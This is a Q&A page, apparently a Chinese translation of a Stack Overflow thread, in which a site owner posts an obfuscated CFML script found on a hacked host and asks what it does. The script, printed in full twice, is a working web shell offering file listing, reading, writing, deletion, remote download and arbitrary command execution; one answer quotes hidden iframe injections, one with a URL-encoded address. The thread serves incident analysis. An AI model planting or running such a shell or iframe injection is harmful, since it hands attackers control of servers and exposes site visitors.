coldfusion - 在托管中发现 CFML 奇怪的脚本

Question

刚刚在朋友被黑的网站上找到了一个脚本。据我所见，该脚本接受一些发布变量并执行一些操作，例如显示目录内容、上传文件、删除文件、读取二进制文件，但文档并不多。有人可以告诉我它更准确地做什么吗？我认为没有格式化，但在“混淆”的单行上。谢谢！

<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.chopper#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9);
for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B">
<CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";
O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);
If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C">
<CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#">
<CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;
if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}
DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" />
<cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) />
<cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) />
<cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#">
<CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);
h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}
F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D">
<CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);
df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();
for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{
cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE>
<CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J">
<CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT>
FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2;
For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT>
<CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M">
<CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" />
</CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH>
</CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>

我在下面手动格式化了它：

<CFSET O="" />
<CFTRY>
<CFSWITCH EXPRESSION=#Form.chopper#>
<CFCASE VALUE="A">
    <CFSCRIPT>O=O&Expandpath("./")&Chr(9);for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT>
</CFCASE>
<CFCASE VALUE="B">
    <CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type">
    <CFLOOP Query="D">
    <CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT>
    </CFLOOP>
</CFCASE>
<CFCASE VALUE="C">
    <CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O">
</CFCASE>
<CFCASE VALUE="D">
    <CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#">
    <CFSET O="1" />
</CFCASE>
<CFCASE VALUE="E">
    <CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}DF(Form.z1);O="1";</CFSCRIPT>
</CFCASE>
<CFCASE VALUE="F">
    <cffile action="readbinary" file="#Form.z1#" variable="B" />
    <cfset J=CreateObject("java","java.nio.ByteBuffer") />
    <cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) />
    <cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) />
    <cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) />
    <cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) />
    <CFCONTENT Type="application/octet-stream" Variable="#X.Array()#">
    <CFABORT>
</CFCASE>
<CFCASE VALUE="G">
    <CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}F.close();O="1";</CFSCRIPT>
</CFCASE>
<CFCASE VALUE="H">
    <CFFUNCTION Name="cpf">
    <CFARGUMENT Name="S">
    <CFARGUMENT Name="D">
    <CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#">
    </CFFUNCTION>
    <CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT>
</CFCASE>
<CFCASE VALUE="I">
    <CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" />
</CFCASE>
<CFCASE VALUE="J">
    <CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" />
</CFCASE>
<CFCASE VALUE="K">
    <CFSCRIPT>FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT>
</CFCASE>
<CFCASE VALUE="L">
    <CFSCRIPT>Z=Form.z2;For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT>
<CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" />
</CFCASE>
<CFCASE VALUE="M">
    <CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" />
</CFCASE>
</CFSWITCH>
<CFCATCH Type="Any">
    <CFSET O="ERROR:// "&CFCatch.Message />
</CFCATCH>
</CFTRY>
<CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>

score 3 · Accepted Answer

我们遭到有人在我们的服务器上放置相同的脚本的攻击。上面的代码需要用 cfdecrypt 解密。

我们网站的结果是将此代码插入到多个文件中：

<iframe  name="top_stories9a" id="top_stories9a" marginwidth="1" marginheight="1" width="210" height="1" src="http://www.collegefun4u.com/" SCROLLING="no" FRAMEBORDER="0"></iframe>

和

<iframe  name="top_stories9a" id="top_stories9a" marginwidth="1" marginheight="1" width="1" height="1" src="http://%77%77%77%2E%63%6F%6C%6C%65%67%65%66%75%6E%34%75%2E%63%6F%6D" SCROLLING="no" FRAMEBORDER="0"></iframe>

因此，如果有人遇到同样的问题，那么值得搜索上述代码并将其删除。加密后，它开始于：

Allaire Cold Fusion Template
Header Size: New Version

希望这可以帮助其他被同一人攻击的人。

我已经在我们的服务器上运行了一个恶意软件扫描程序，但它没有发现任何其他可能已经安装的东西，但是如果有人有任何额外的信息，任何可能被这次攻击安装的后门，那么这将有所帮助。

谢谢。

score 0 · Accepted Answer

0

解决了。它做我之前说的。

于 2012-10-27T16:07:25.100 回答

coldfusion - 在托管中发现 CFML 奇怪的脚本

2 回答 2

Related

Reference